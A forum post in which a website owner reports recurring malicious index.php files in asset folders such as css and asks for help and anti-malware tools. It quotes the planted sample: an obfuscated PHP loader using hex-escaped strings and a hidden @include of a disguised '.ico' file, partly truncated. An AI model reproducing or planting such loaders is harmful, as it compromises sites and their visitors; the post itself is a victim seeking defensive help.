Facebook
TwitterHi,
I have this problem:
Sometimes I find new and strange index.php files with malware in some folders(for example httpdocs/css/index.php). These files contain code like this:
It's in folders that are not relevant(you cant access index.php from css/js/etc.. folder).
I thought my password was compromised so I tried changing but didn't help. So now I'm not sure how it's getting there.
Anyone has an idea?
Thanks
// I probably should install some anti-malware extension or something like that to detect malware and delete it. Can you suggest one that is good?
I have this problem:
Sometimes I find new and strange index.php files with malware in some folders(for example httpdocs/css/index.php). These files contain code like this:
Code:
<?php $sba74ec = 386;$GLOBALS['v0ed'] = Array();global $v0ed;$v0ed = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['z0aeb3b3'] = "\x7d\x33\x34\x23\x6d\x77\x5b\x29\x3a\x3f\x50\x40\x6b\x49\x2e\x6e\x61\x2f\x36\x4e\x65\x75\x4a\x2c\x5c\x39\x51\x3c\x41\x54\x38\x76\x7c\x6f\x4f\x5a\x55\x44\x5f\x3b\x6a\x67\x73\x57\x62\x2d\x9\x68\x47\x28\x32\x24\x2a\x48\x4b\x52\x2b\x74\x4c\x37\x46\x45\x79\x25\x35\x7e\x4d\xa\x63\x56\x64\x3d\x58\x30\x7a\x72\x31\xd\x20\x66\x6c\x59\x53\x27\x3e\x70\x26\x5d\x7b\x71\x42\x5e\x21\x69\x78\x43\x60\x22";$v0ed[$v0ed['z0aeb3b3'][80].$v0ed['z0aeb3b3'][18].$v0ed['z0aeb3b3'][50].$v0ed['z0aeb3b3'][44].$v0ed['z0aeb3b3'][44].$v0ed['z0aeb3b3'][50].$v0ed['z0aeb3b3'][2].$v0ed['z0aeb3b3'][50].$v0ed['z0aeb3b3'][20]] = $v0ed['z0aeb3b3'][68].$v0ed['z0aeb3b3'][47].$v0ed['z0aeb3b3'][75];$v0ed[$v0ed['z0aeb3b3'][93].$v0ed['z0aeb3b3'][25].$v0ed['z0aeb3b3'][25].$v0ed['z0aeb3b3'][73].$v0ed['z0aeb3b3'][68].$v0ed['z0aeb3b3'][16].$v0ed['z0aeb3b3'][18].$v0ed['z0aeb3b3'][16]] = $v0ed['z0aeb3b3'][33].$v0ed['z0aeb3b3'][75].$v0ed['z0aeb3b3'][70];$v0ed[$v0ed['z0aeb3b3'][79].$v0ed['z0aeb3b3'][76].$v0ed['z0aeb3b3'][59].$v0ed['z0aeb3b3'][44]] = $v0ed['z0aeb3b3'][42].$v0ed['z0aeb3b3'][57].$v0ed['z0aeb3b3'][75].$v0ed['z0aeb3b3'][80].$v0ed['z0aeb3b3'][20].$v0ed['z0aeb3b3'][15];$v0ed[$v0ed['z0aeb3b3']><?php
/*1bb13*/
@include "\x2fv\x61r\x2fw\x77w\x2fv\x68o\x73t\x73/\x61p\x70l\x65t\x72h\x2ec\x7a/\x64e\x76.\x61p\x70l\x65t\x72h\x2ec\x7a/\x70u\x62l\x69c\x2fi\x6da\x67e\x73/\x70r\x6fd\x75c\x74s\x2f.\x32d\x388\x65a\x39f\x2ei\x63o";
/*1bb13*/It's in folders that are not relevant(you cant access index.php from css/js/etc.. folder).
I thought my password was compromised so I tried changing but didn't help. So now I'm not sure how it's getting there.
Anyone has an idea?
Thanks
// I probably should install some anti-malware extension or something like that to detect malware and delete it. Can you suggest one that is good?
Last edited:
